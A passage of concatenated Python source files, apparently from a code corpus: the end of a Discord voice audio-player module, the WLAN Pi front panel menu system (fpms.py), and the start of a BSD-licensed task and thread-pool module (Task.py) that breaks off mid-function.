This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
fpms.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
"""
FPMS
~~~~
Front Panel Menu System
"""
import getopt
import os
import os.path
import random
import signal
import socket
import subprocess
import sys
import termios
import threading
import time
import tty
from gpiozero import Button as GPIO_Button
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
from PIL import Image, ImageDraw, ImageFont
# Check we're running as root
if not os.geteuid()==0:
print("fpms must be run as root ... exiting ...")
sys.exit(-1)
from .__version__ import __title__, __version__
from .modules import wlanpi_oled as oled
from .modules.apps.profiler import *
from .modules.apps.scanner import *
from .modules.bluetooth import *
from .modules.cloud_tests import CloudUtils
from .modules.constants import (
BUTTONS_PINS,
DISPLAY_MODE,
IMAGE_DIR,
MODE_FILE,
NAV_BAR_TOP,
PAGE_HEIGHT,
PAGE_SLEEP,
PAGE_WIDTH,
SCRIPT_PATH,
WLANPI_IMAGE_FILE,
)
from .modules.env_utils import EnvUtils
from .modules.modes import *
from .modules.nav.buttons import Button
from .modules.network import *
from .modules.pages.display import Display
from .modules.pages.homepage import HomePage
from .modules.pages.page import Page
from .modules.pages.pagedtable import PagedTable
from .modules.pages.simpletable import SimpleTable
from .modules.system import *
from .modules.battery import *
from .modules.utils import *
def main():
global running
####################################
# Parse arguments
####################################
def authors():
authors = os.path.realpath(os.path.join(os.getcwd(), "AUTHORS.md"))
if not os.path.isfile(authors):
# Couldn't find authors
print(authors)
return ""
else:
with open(authors) as f:
return "\n".join(filter(None, [line if line.startswith('*') else "" for line in f.read().splitlines()]))
def usage():
return """
usage: fpms [-a] [-h] [-e] [-v]
wlanpi-fpms drives the Front Panel Menu System on the WLAN Pi
optional options:
-a print authors
-e emulate buttons from keyboard
-h show this message and exit
-v show module version and exit
"""
try:
opts, _args = getopt.getopt(sys.argv[1:], ":ahev", ["authors", "help", "emulate-buttons", "version"])
except getopt.GetoptError as error:
print("{0} ... ".format(error))
print(usage())
sys.exit(2)
emulate = False
for opt, arg in opts:
if opt in ['-e', "--emulate-buttons"]:
emulate = True
elif opt in ("-a", "--authors"):
print(authors())
sys.exit()
elif opt in ("-h", "--help"):
print(usage())
sys.exit()
elif opt in ("-v", "--version"):
print("{0} {1}".format(__title__, __version__))
sys.exit()
else:
assert False, "unhandled option"
####################################
# Initialize the SEED OLED display
####################################
oled.init()
# Set display to normal mode (i.e non-inverse mode)
oled.setNormalDisplay()
oled.setHorizontalMode()
#######################################
# Initialize various global variables
#######################################
g_vars = {
##################################################
# Shared status signals (may be changed anywhere)
##################################################
# This variable is shared between activities and is set to True if a
# drawing action in already if progress (e.g. by another activity). An activity
# happens during each cycle of the main while loop or when a button is pressed
# (This does not appear to be threading or process spawning)
'drawing_in_progress': False, # True when page being painted on screen
'shutdown_in_progress': False, # True when shutdown or reboot started
'screen_cleared': False, # True when display cleared (e.g. screen save)
'display_state': 'page', # current display state: 'page' or 'menu'
'sig_fired': False, # Set to True when button handler fired
'option_selected': 0, # Content of currently selected menu level
'current_menu_location': [0], # Pointer to current location in menu structure
'current_scroll_selection': 0, # where we currently are in scrolling table
'current_mode': 'classic', # Currently selected mode (e.g. wconsole/classic)
'start_up': True, # True if in initial (home page) start-up state
'disable_keys': False, # Set to true when need to ignore key presses
'table_list_length': 0, # Total length of currently displayed table
'table_pages': 1, # pages in current table
'result_cache': False, # used to cache results when paging info
'speedtest_status': False, # Indicates if speedtest has run or is in progress
'speedtest_result_text': '', # tablulated speedtest result data
'button_press_count': 0, # global count of button pressses
'last_button_press_count': -1, # copy of count of button pressses used in main loop
'pageSleepCountdown': PAGE_SLEEP, # Set page sleep control
'home_page_name': "Home", # Display name for top level menu
'blinker_status': False, # Blinker status
'eth_carrier_status': 0, # Eth0 physical link status
'eth_last_known_address': "", # Last known eth0 address
'eth_last_reachability_test': 0, # Number of seconds elapsed since last reachability test
'eth_last_reachability_result' : True, # Last reachability state
}
############################
# shared objects
############################
g_vars['image'] = Image.new(DISPLAY_MODE, (PAGE_WIDTH, PAGE_HEIGHT))
g_vars['draw'] = ImageDraw.Draw(g_vars['image'])
g_vars['reboot_image'] = Image.open(IMAGE_DIR + '/reboot.png').convert(DISPLAY_MODE)
#####################################
# check our current operating mode
#####################################
env_utils = EnvUtils()
g_vars['current_mode'] = env_utils.get_mode(MODE_FILE)
#######################################################################
# Server mode non-persistence
# If the Pi is in Server schedule mode switch to Classic for next boot
#######################################################################
if g_vars['current_mode'] == "server":
schedule_server_to_classic = "/etc/wlanpi-server/scripts/schedule-switch-to-classic"
subprocess.Popen([schedule_server_to_classic])
##################################
# Static info we want to get once
##################################
# get & the current version of WLANPi image
g_vars['wlanpi_ver'] = env_utils.get_image_ver(WLANPI_IMAGE_FILE)
# get hostname
g_vars['hostname'] = env_utils.get_hostname()
###########################
# Network menu area utils
###########################
def show_interfaces():
network_obj = Network(g_vars)
network_obj.show_interfaces(g_vars)
def show_wlan_interfaces():
network_obj = Network(g_vars)
network_obj.show_wlan_interfaces(g_vars)
def show_eth0_ipconfig():
network_obj = Network(g_vars)
network_obj.show_eth0_ipconfig(g_vars)
def show_vlan():
network_obj = Network(g_vars)
network_obj.show_vlan(g_vars)
def show_lldp_neighbour():
network_obj = Network(g_vars)
network_obj.show_lldp_neighbour(g_vars)
def show_cdp_neighbour():
network_obj = Network(g_vars)
network_obj.show_cdp_neighbour(g_vars)
def show_publicip():
network_obj = Network(g_vars)
network_obj.show_publicip(g_vars)
def show_publicip6():
network_obj = Network(g_vars)
network_obj.show_publicip(g_vars, ip_version=6)
###########################
# Bluetooth menu area
###########################
def bluetooth_status():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_status(g_vars)
def bluetooth_pair():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_pair(g_vars)
def bluetooth_on():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_on(g_vars)
def bluetooth_off():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_off(g_vars)
###########################
# Utils menu area
###########################
def show_reachability():
utils_obj = Utils(g_vars)
utils_obj.show_reachability(g_vars)
def show_speedtest():
utils_obj = Utils(g_vars)
utils_obj.show_speedtest(g_vars)
def show_mist_test():
utils_obj = CloudUtils(g_vars)
utils_obj.test_mist_cloud(g_vars)
def show_aruba_test():
utils_obj = CloudUtils(g_vars)
utils_obj.test_aruba_cloud(g_vars)
def show_blinker():
utils_obj = Utils(g_vars)
utils_obj.show_blinker(g_vars)
def stop_blinker():
utils_obj = Utils(g_vars)
utils_obj.stop_blinker(g_vars)
def show_wpa_passphrase():
utils_obj = Utils(g_vars)
utils_obj.show_wpa_passphrase(g_vars)
def show_usb():
utils_obj = Utils(g_vars)
utils_obj.show_usb(g_vars)
def show_ufw():
utils_obj = Utils(g_vars)
utils_obj.show_ufw(g_vars)
############################
# Modes area
############################
def wconsole_switcher():
mode_obj = Mode(g_vars)
mode_obj.wconsole_switcher(g_vars)
def hotspot_switcher():
mode_obj = Mode(g_vars)
mode_obj.hotspot_switcher(g_vars)
def wiperf_switcher():
mode_obj = Mode(g_vars)
mode_obj.wiperf_switcher(g_vars)
def server_switcher():
mode_obj = Mode(g_vars)
mode_obj.server_switcher(g_vars)
###########################
# Apps area
###########################
def profiler_status():
app_obj = Profiler(g_vars)
app_obj.profiler_status(g_vars)
def profiler_stop():
app_obj = Profiler(g_vars)
app_obj.profiler_stop(g_vars)
def profiler_start():
app_obj = Profiler(g_vars)
app_obj.profiler_start(g_vars)
def profiler_start_no11r():
app_obj = Profiler(g_vars)
app_obj.profiler_start_no11r(g_vars)
def profiler_start_no11ax():
app_obj = Profiler(g_vars)
app_obj.profiler_start_no11ax(g_vars)
def profiler_purge_reports():
app_obj = Profiler(g_vars)
app_obj.profiler_purge_reports(g_vars)
def profiler_purge_files():
app_obj = Profiler(g_vars)
app_obj.profiler_purge_files(g_vars)
def scanner_scan():
app_obj = Scanner(g_vars)
app_obj.scanner_scan(g_vars)
def scanner_scan_nohidden():
app_obj = Scanner(g_vars)
app_obj.scanner_scan_nohidden(g_vars)
###########################
# System menu area utils
###########################
def shutdown():
system_obj = System(g_vars)
system_obj.shutdown(g_vars)
def reboot():
system_obj = System(g_vars)
system_obj.reboot(g_vars)
def show_summary():
system_obj = System(g_vars)
system_obj.show_summary(g_vars)
def show_battery():
system_obj = Battery(g_vars)
system_obj.show_battery(g_vars)
def show_date():
system_obj = System(g_vars)
system_obj.show_date(g_vars)
def show_about():
system_obj = System(g_vars)
system_obj.show_about(g_vars)
#############################
# Button presses & home page
#############################
def home_page():
homepage_obj = HomePage(g_vars)
homepage_obj.home_page(g_vars, menu)
def menu_down():
button_obj = Button(g_vars, menu)
button_obj.menu_down(g_vars, menu)
def menu_up():
button_obj = Button(g_vars, menu)
button_obj.menu_up(g_vars, menu)
def menu_left():
button_obj = Button(g_vars, menu)
button_obj.menu_left(g_vars, menu)
def menu_right():
button_obj = Button(g_vars, menu)
button_obj.menu_right(g_vars, menu)
def menu_center():
button_obj = Button(g_vars, menu)
button_obj.menu_center(g_vars, menu)
#######################
# menu structure here
#######################
# assume classic mode menu initially...
menu = [
{"name": "Network", "action": [
{"name": "Interfaces", "action": show_interfaces},
{"name": "WLAN Interfaces", "action": show_wlan_interfaces},
{"name": "Eth0 IP Config", "action": show_eth0_ipconfig},
{"name": "Eth0 VLAN", "action": show_vlan},
{"name": "LLDP Neighbour", "action": show_lldp_neighbour},
{"name": "CDP Neighbour", "action": show_cdp_neighbour},
{"name": "Public IPv4", "action": show_publicip},
{"name": "Public IPv6", "action": show_publicip6},
]
},
{"name": "Bluetooth", "action": [
{"name": "Status", "action": bluetooth_status},
{"name": "Turn On", "action": bluetooth_on},
{"name": "Turn Off", "action": bluetooth_off},
{"name": "Pair Device", "action": bluetooth_pair},
]
},
{"name": "Utils", "action": [
{"name": "Reachability", "action": show_reachability},
{"name": "Speedtest", "action": [
{"name": "Run Test", "action": show_speedtest},
]
},
{"name": "Cloud Tests", "action": [
{"name": "Run Aruba Test", "action": show_aruba_test},
{"name": "Run Mist Test", "action": show_mist_test},
]
},
{"name": "Port Blinker", "action": [
{"name": "Start", "action": show_blinker},
{"name": "Stop", "action": stop_blinker},
]
},
{"name": "WPA Passphrase", "action": show_wpa_passphrase},
{"name": "USB Devices", "action": show_usb},
{"name": "UFW Ports", "action": show_ufw},
]
},
{"name": "Modes", "action": [
{"name": "Wi-Fi Console", "action": [
{"name": "Confirm", "action": wconsole_switcher},
]
},
{"name": "Hotspot", "action": [
{"name": "Confirm", "action": hotspot_switcher},
]
},
{"name": "Wiperf", "action": [
{"name": "Confirm", "action": wiperf_switcher},
]
},
{"name": "Server", "action": [
{"name": "Confirm", "action": server_switcher},
]
},
]
},
{"name": "Apps", "action": [
{"name": "Profiler", "action": [
{"name": "Status", "action": profiler_status},
{"name": "Stop", "action": profiler_stop},
{"name": "Start", "action": profiler_start},
{"name": "Start (no 11r)", "action": profiler_start_no11r},
{"name": "Start (no 11ax)", "action": profiler_start_no11ax},
{"name": "Purge Reports", "action": [
{"name": "Confirm", "action": profiler_purge_reports},
]
},
{"name": "Purge Files", "action": [
{"name": "Confirm", "action": profiler_purge_files},
]
}
]
},
{"name": "Scanner", "action": [
{"name": "Scan", "action": scanner_scan},
{"name": "Scan (no hidden)", "action": scanner_scan_nohidden},
]
},
]
},
{"name": "System", "action": [
{"name": "Shutdown", "action": [
{"name": "Confirm", "action": shutdown},
]
},
{"name": "Reboot", "action": [
{"name": "Confirm", "action": reboot},
]
},
{"name": "Summary", "action": show_summary},
{"name": "Battery", "action": show_battery},
{"name": "Date/Time", "action": show_date},
{"name": "About", "action": show_about},
]
},
]
# update menu options data structure if we're in non-classic mode
if g_vars['current_mode'] == "wconsole":
switcher_dispatcher = wconsole_switcher
g_vars['home_page_name'] = "Wi-Fi Console"
if g_vars['current_mode'] == "hotspot":
switcher_dispatcher = hotspot_switcher
g_vars['home_page_name'] = "Hotspot"
if g_vars['current_mode'] == "wiperf":
switcher_dispatcher = wiperf_switcher
g_vars['home_page_name'] = "Wiperf"
if g_vars['current_mode'] == "server":
switcher_dispatcher = server_switcher
g_vars['home_page_name'] = "Server"
if g_vars['current_mode'] != "classic":
menu[3] = {"name": "Mode", "action": [
{"name": "Classic Mode", "action": [
{"name": "Confirm", "action": switcher_dispatcher},
]
},
]
}
menu.pop(4)
# Set up handlers to process key presses
def button_press(gpio_pin, g_vars=g_vars):
DOWN_KEY = BUTTONS_PINS['down']
UP_KEY = BUTTONS_PINS['up']
RIGHT_KEY = BUTTONS_PINS['right']
LEFT_KEY = BUTTONS_PINS['left']
CENTER_KEY = BUTTONS_PINS['center']
if g_vars['disable_keys'] == True:
# someone disabled the front panel keys as they don't want to be interrupted
return
if (g_vars['sig_fired']):
# signal handler already in progress, ignore this one
return
# user pressed a button, reset the sleep counter
g_vars['pageSleepCountdown'] = PAGE_SLEEP
g_vars['start_up'] = False
if g_vars['drawing_in_progress'] or g_vars['shutdown_in_progress']:
return
# If we get this far, an action wil be taken as a result of the button press
# increment the button press counter to indicate the something has been done
# and a page refresh is required
g_vars['button_press_count'] += 1
# if display has been switched off to save screen, power back on and show home menu
if g_vars['screen_cleared']:
g_vars['screen_cleared'] = False
g_vars['pageSleepCountdown'] = PAGE_SLEEP
return
# Down key pressed
if gpio_pin == DOWN_KEY:
g_vars['sig_fired'] = True
menu_down()
g_vars['sig_fired'] = False
return
# Down key pressed
if gpio_pin == UP_KEY:
g_vars['sig_fired'] = True
menu_up()
g_vars['sig_fired'] = False
return
# Right/Selection key pressed
if gpio_pin == RIGHT_KEY:
g_vars['sig_fired'] = True
menu_right()
g_vars['sig_fired'] = False
return
# Left/Back key
if gpio_pin == LEFT_KEY:
g_vars['sig_fired'] = True
menu_left()
g_vars['sig_fired'] = False
return
# Center key
if gpio_pin == CENTER_KEY:
g_vars['sig_fired'] = True
menu_center()
g_vars['sig_fired'] = False
return
###############################################################################
#
# ****** MAIN *******
#
###############################################################################
# First time around (power-up), draw logo on display
'''
rogues_gallery = [
IMAGE_DIR + '/wlanprologo',
IMAGE_DIR + '/wlanprologo.png',
IMAGE_DIR + '/joshschmelzle.png',
IMAGE_DIR + '/crv.png',
IMAGE_DIR + '/jolla.png',
IMAGE_DIR + '/wifinigel.png',
IMAGE_DIR + '/dansfini.png',
IMAGE_DIR + '/jiribrejcha.png'
]
random_image = random.choice(rogues_gallery)
image0 = Image.open(random_image).convert(DISPLAY_MODE)
oled.drawImage(image0)
time.sleep(2.0)
'''
###############################################################################
# Splash screen
###############################################################################
# First time around (power-up), animate logo on display
splash_screen_images = [
IMAGE_DIR + '/wlanpi0.png',
IMAGE_DIR + '/wlanpi1.png',
IMAGE_DIR + '/wlanpi2.png',
IMAGE_DIR + '/wlanpi3.png',
IMAGE_DIR + '/wlanpi4.png'
]
for image in splash_screen_images:
img = Image.open(image).convert(DISPLAY_MODE)
oled.drawImage(img)
time.sleep(0.100)
# Leave logo on screen some more time
time.sleep(2)
###############################################################################
# Buttons setup
###############################################################################
if emulate:
Device.pin_factory = MockFactory()
# Set signal handlers for button presses - these fire every time a button
# is pressed
def down_key():
button_press(BUTTONS_PINS['down'], g_vars)
def up_key():
button_press(BUTTONS_PINS['up'], g_vars)
def left_key():
button_press(BUTTONS_PINS['left'], g_vars)
def right_key():
button_press(BUTTONS_PINS['right'], g_vars)
def center_key():
button_press(BUTTONS_PINS['center'], g_vars)
button_down = GPIO_Button(BUTTONS_PINS['down'])
button_up = GPIO_Button(BUTTONS_PINS['up'])
button_left = GPIO_Button(BUTTONS_PINS['left'])
button_right = GPIO_Button(BUTTONS_PINS['right'])
button_center = GPIO_Button(BUTTONS_PINS['center'])
button_down.when_pressed = down_key
button_up.when_pressed = up_key
button_left.when_pressed = left_key
button_right.when_pressed = right_key
button_center.when_pressed = center_key
running = True
##############################################################################
# Emulate button presses using a keyboard
##############################################################################
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def emulate_buttons():
global running
while True:
char = getch()
if (char == "k" or char == "K"):
running = False
break
if (char == "8" or char == "w"):
button_up.pin.drive_low()
button_up.pin.drive_high()
if (char == "2" or char == "x"):
button_down.pin.drive_low()
button_down.pin.drive_high()
if (char == "4" or char == "a"):
button_left.pin.drive_low()
button_left.pin.drive_high()
if (char == "6" or char == "d"):
button_right.pin.drive_low()
button_right.pin.drive_high()
if (char == "5" or char == "s"):
button_center.pin.drive_low()
button_center.pin.drive_high()
if emulate:
print("UP = 'w', DOWN = 'x', LEFT = 'a', RIGHT = 'd', CENTER = 's'")
print("Press 'k' to terminate.")
e = threading.Thread(name="button-emulator", target=emulate_buttons)
e.start()
##############################################################################
# Helper functions
##############################################################################
def check_eth():
'''
Detects a change in the status of the Ethernet port and wakes up
the screen if necessary
'''
try:
cmd = "cat /sys/class/net/eth0/carrier"
carrier = int(subprocess.check_output(cmd, shell=True).decode().strip())
if g_vars['eth_carrier_status'] != carrier:
g_vars['screen_cleared'] = False
g_vars['pageSleepCountdown'] = PAGE_SLEEP
g_vars['eth_carrier_status'] = carrier
except subprocess.CalledProcessError as exc:
pass
##############################################################################
# Constant 'while' loop to paint images on display or execute actions in
# response to selections made with buttons. When any of the 3 WLANPi buttons
# are pressed, I believe the signal handler takes over the Python interpreter
# and executes the code associated with the button. The original flow continues
# once the button press action has been completed.
#
# The current sleep period of the while loop is ignored when a button is
# pressed.
#
# All global variables defined outside of the while loop are preserved and may
# read/set as required. The same variables are available for read/write even
# when a button is pressed and an interrupt occurs: no additional thread or
# interpreter with its own set of vars appears to be launched. For this reason,
# vars may be used to signal between the main while loop and any button press
# activity to indicate that processes such as screen paints are in progress.
#
# Despite the sample code suggesting threading is used I do not believe this
# is the case, based on testing with variable scopes and checking for process
# IDs when different parts of the script are executing.
##############################################################################
while running:
try:
# check if eth0 link status has changed so we exit from screen save if needed
check_eth()
if g_vars['shutdown_in_progress'] or g_vars['screen_cleared'] or g_vars['drawing_in_progress'] or g_vars['sig_fired']:
# we don't really want to do anything at the moment, lets
# nap and loop around
time.sleep(1)
continue
# Draw a menu or execute current action (dispatcher)
if g_vars['display_state'] != 'menu':
# no menu shown, so must be executing action.
# if we've just booted up, show home page
if g_vars['start_up'] == True:
g_vars['option_selected'] = home_page
# Re-run current action to refresh screen
#
# Handle when g_vars['option_selected'] does not return
# a func but returns a list instead and fpms freezes.
#
# investigate by uncommenting these print statements
# and `tail -f /tmp/nanoled-python.log`:
# print(g_vars['option_selected'])
# print(type(g_vars['option_selected']))
if isinstance(g_vars['option_selected'], list):
continue
else:
g_vars['option_selected']()
else:
# lets try drawing our page (or refresh if already painted)
# No point in repainting screen if we are on a
# menu page and no buttons pressed since last loop cycle
# In reality, this condition will rarely (if ever) be true
# as the page painting is driven from the key press which
# interrupts this flow anyhow. Left in as a safeguard
if g_vars['button_press_count'] > g_vars['last_button_press_count']:
page_obj = Page(g_vars)
page_obj.draw_page(g_vars, menu)
# if screen timeout is zero, clear it if not already done (blank the
# display to reduce screenburn)
if g_vars['pageSleepCountdown'] == 0 and g_vars['screen_cleared'] == False:
oled.clearDisplay()
g_vars['screen_cleared'] = True
g_vars['pageSleepCountdown'] = g_vars['pageSleepCountdown'] - 1
# have a nap before we start our next loop
time.sleep(1)
except KeyboardInterrupt:
break
except IOError as ex:
print("Error " + str(ex))
g_vars['last_button_press_count'] = g_vars['button_press_count']
'''
Discounted ideas
1. Vary sleep timer for main while loop (e.g. longer for less frequently
updating data) - doesn;t work as main while loop may be in middle of
long sleep when button action taken, so screen refresh very long.
'''
|
Task.py
|
#
# Task.py -- Basic command pattern and thread pool implementation.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from __future__ import absolute_import, print_function
from . import six
from .six.moves import map, zip
import sys
import time
import os
if six.PY2:
import thread
import Queue
else:
import _thread as thread
import queue as Queue
# NOTE: See http://bugs.python.org/issue7946
# we cannot effectively use threading for loading files/network/etc.
# without setting the switchinterval down on python 3 due to the new
# GIL implementation
_swival = 0.000001
sys.setswitchinterval(_swival)
import threading
import traceback
class TaskError(Exception):
"""Exception generated for task errors"""
pass
class TaskTimeout(TaskError):
"""Exception generated when timing out waiting on a task"""
pass
class UserTaskException(Exception):
pass
# ------------ BASIC TASKS ------------
class Task(object):
"""This class implements a basic Task (command) abstraction. The
methods define the interface for starting, cancelling, waiting on a
task, etc.
"""
def __init__(self):
"""
The constructor sets bare essentials for a Task object. See the
initialize() and start() methods.
"""
self.ev_done = threading.Event()
self.callbacks = Queue.Queue()
self.tag = None
self.logger = None
self.threadPool = None
# Lock for task state critical sections
self.tlock = threading.RLock()
# Parent task can set this (or add to it) explicitly to determine
# which values will be copied when it calls initialize() on a child
# task.
self.shares = ['logger', 'threadPool', 'shares']
super(Task, self).__init__()
def initialize(self, taskParent, override=None):
"""This method initializes a task for (re)use. taskParent is the
object instance of the parent task, or a 'task environment' (something
that runs tasks).
If subclass overrides this method, it should call the superclass
method at some point.
- Copy shared data from taskParent, overriding items from _override_
if they are present there ('contagion' of task values).
- Generate a unique tag, to be used with the Gen2 Monitor.
- Clear done event, initialize times and result.
"""
# For now, punt if we have no apparent parent
if taskParent and hasattr(taskParent, 'shares'):
# Copy some variables from our parent task, unless they are being
# overridden explicitly. Using this general "contagion" mechanism,
# a task can cause it's children to have values available to them
# without passing them explicitly.
for var in taskParent.shares:
if override and var in override:
self.__dict__[var] = override[var]
else:
#print "COPYING VAR FROM PARENT: %s(%s)" % (var, str(taskParent.__dict__[var]))
self.__dict__[var] = taskParent.__dict__[var]
else:
#raise TaskError("Cannot initialize task without a taskParent!")
pass
# Generate our own unique tag. 'tagger' should have been transmitted
# from the parent task
if not self.tag:
try:
self.tag = str(taskParent) + '.' + self.tagger.get_tag(self)
except Exception:
# Failed--fall back to internal tagger
self.tag = get_tag(taskParent)
# Some per-task specific initialization
self.ev_done.clear()
self.starttime = time.time()
self.endtime = 0
self.totaltime = 0
self.result = None
return self.tag
def start(self):
"""This method starts a task executing and returns immediately.
Subclass should override this method, if it has an asynchronous
way to start the task and return immediately.
"""
if self.threadPool:
self.threadPool.addTask(self)
# Lets other threads have a chance to run
time.sleep(0)
else:
raise TaskError("start(): nothing to start for task %s" % self)
def init_and_start(self, taskParent, override={}):
"""Convenience method to initialize and start a task.
"""
tag = self.initialize(taskParent, override=override)
self.start()
return tag
def check_state(self):
"""Abstract method that should check for pause, cancellation, or
any other sort of preemption event.
"""
pass
def extend_shares(self, varlist):
shares = set(self.shares)
for var in varlist:
if hasattr(self, var):
shares.add(var)
self.shares = shares
def stop(self):
"""This method cancels an executing task (if possible).
Subclass should override this method.
Return True if task could be cancelled, False if not?
"""
raise TaskError("Task %s: subclass should override stop() method!" % (
self))
def pause(self):
"""This method pauses an executing task (if possible).
Subclass should override this method.
Return True if task could be paused, False if not?
"""
raise TaskError("Task %s: subclass should override pause() method!" % (
self))
def resume(self):
"""This method resumes an executing task (if possible).
Subclass should override this method, should not call super.resume().
Return True if task could be resumed, False if not?
"""
raise TaskError("Task %s: subclass should override resume() method!" % (
self))
def wait(self, timeout=None):
"""This method waits for an executing task to finish.
Subclass can override this method if necessary.
"""
self.ev_done.wait(timeout=timeout)
if not self.ev_done.is_set():
raise TaskTimeout("Task %s timed out." % self)
# --> self.result is set
# If it is an exception, then raise it in this waiter
if isinstance(self.result, Exception):
raise self.result
# Release waiters and perform callbacks
# done() has already been called, because of self.ev_done check
# "asynchronous" tasks should could call done() here
#self.done(self.result)
return self.result
def step(self):
"""If a task has a way of stepping through an operation. It can
implement this method. Subclass should not call super.step().
"""
raise TaskError("Task %s: subclass should override step() method!" %
self)
def execute(self):
"""This method does the work of a task (if executed by the
thread pool) and returns when it is finished. *** Subclass should
override this method! *** It should take no arguments, and can
return anything.
"""
raise TaskError("Task %s: subclass should override execute() method!" %
self)
def done(self, result, noraise=False):
"""This method is called when a task has finished executing.
Subclass can override this method if desired, but should call
superclass method at the end.
"""
# [??] Should this be in a critical section?
# Has done() already been called on this task?
if self.ev_done.is_set():
# ??
if isinstance(self.result, Exception) and (not noraise):
raise self.result
return self.result
# calculate running time and other finalization
self.endtime = time.time()
try:
self.totaltime = self.endtime - self.starttime
except AttributeError:
# task was not initialized properly
self.totaltime = 0.0
self.result = result
# Release thread waiters
self.ev_done.set()
# Perform callbacks for event-style waiters
self.do_callbacks()
# If the result is an exception, then our final act is to raise
# it in the caller, unless the caller explicitly supressed that
if isinstance(result, Exception) and (not noraise):
raise result
return result
def register_callback(self, fn, args=None):
"""This method is called to register a callback function to be
called when a task terminates.
Subclass should probably not override this method.
"""
if args is None:
args = []
if callable(fn):
self.callbacks.put((fn, args))
else:
raise TaskError("Function argument is not a callable: %s" % \
str(fn))
def do_callbacks(self):
"""Makes callbacks on all registered functions waiting on this task.
"""
while not self.callbacks.empty():
(fn, rest) = self.callbacks.get()
args = [self.result]
args.extend(rest)
fn(*args)
def get_tag(self):
"""This is only valid AFTER initialize() has been called on the task.
"""
return self.tag
def __str__(self):
"""Returns a string representation of a task (e.g. for debugging).
Subclass can override this method if desired.
"""
return str(self.tag)
def __lt__(self, other):
return False
def getExecutionTime(self):
return self.totaltime
def runTask(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task.
"""
# Initialize the task.
task.initialize(self)
# Start the task.
task.start()
# Lets other threads run
time.sleep(0)
# Wait for it to finish.
res = task.wait(timeout=timeout)
# Now we're done
return res
def run(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task. Simply calls runTask().
"""
return self.runTask(task, timeout=timeout)
# For testing...
class printTask(Task):
"""Simple task that prints msg."""
def __init__(self, msg):
self.msg = msg
super(printTask, self).__init__()
def execute(self):
print(self.msg)
class sleepTask(Task):
"""Simple task that sleeps for delay seconds."""
def __init__(self, delay):
self.delay = delay
super(sleepTask, self).__init__()
def execute(self):
self.ev_done.wait(timeout=self.delay)
class FuncTask(Task):
"""Simple task that calls func and returns func's return value."""
def __init__(self, func, args, kwdargs, logger=None):
self.func = func
self.args = args
self.kwdargs = kwdargs
self.logger = logger
super(FuncTask, self).__init__()
def execute(self):
if self.logger:
# Cap logging size around 500 characters
s_args = str(self.args)
if len(s_args) > 500:
s_args = s_args[:500]
s_kwdargs = str(self.kwdargs)
